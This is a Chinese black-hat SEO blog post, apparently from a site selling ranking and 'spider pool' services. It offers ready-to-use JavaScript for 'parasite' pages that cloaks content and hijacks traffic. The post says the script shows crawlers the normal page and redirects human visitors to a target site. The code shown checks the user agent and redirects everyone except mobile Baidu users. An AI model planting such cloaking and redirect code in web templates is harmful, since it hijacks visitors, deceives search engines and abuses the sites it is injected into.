•   QQ:25496334 代建出租蜘蛛池代做排名
  •   请到后台配置公告想信息-2

泛目录,寄生虫-最新通用判断来路劫持跳转代码

摘要: ˂atarget="_blank"href="http://www.seo6889.com/tags/20190925145845/"class="page_speeder_216183221...

seo6889.com/tags/20190925145845/" class="page_speeder_216183221 sae8faf s9803c7 page_speeder_345233642">黑帽6889(www.seo6889.com)专注于:黑帽排名,黑帽SEO教程,黑帽SEO,黑帽SEO,黑帽seo培训

泛目录,寄生虫-最新通用判断来路劫持跳转代码

在模板里引入JS文件代码如下所示:

以下为判断来路跳转劫持代码,以文本方式编辑需要引流的网站即可。本劫持代码自动判断是蜘蛛访问还是人为访问,蜘蛛访问正常抓取页面,人为访问自动劫持到需要引流的网站!var sUserAgent= navigator.userAgent.toLowerCase();

var bIsIphoneOs= sUserAgent.match(/iphone/i) == "iphone";

var bIsSymb= sUserAgent.match(/symbianos/i) == "symbianos";

var bIsIpad= sUserAgent.match(/ipad/i) == "ipad";

var bIsIpod= sUserAgent.match(/ipod/i) == "ipod";

var bIsAndroid= sUserAgent.match(/android/i) == "android";

var bIsCE= sUserAgent.match(/windows ce/i) == "windows ce";

var bIsWM= sUserAgent.match(/windows mobile/i) == "windows mobile";

var bIsWP= sUserAgent.match(/windows phone/i) == "windows phone";


var isBDAPP=sUserAgent.match(/baiduboxapp/i) == "baiduboxapp";

var isBDBrowser=sUserAgent.match(/baidubrowser/i) == "baidubrowser";

var isM= bIsIphoneOs || bIsSymb || bIsIpad || bIsIpod || bIsAndroid || bIsCE || bIsWM || bIsWP;


if (!isM || (!isBDAPP && !isBDBrowser)){

  window.location.href="url";

}


分享到:

发表评论 取消回复

评论列表

还没有评论,快来说点什么吧~

公众号二维码

微信公众号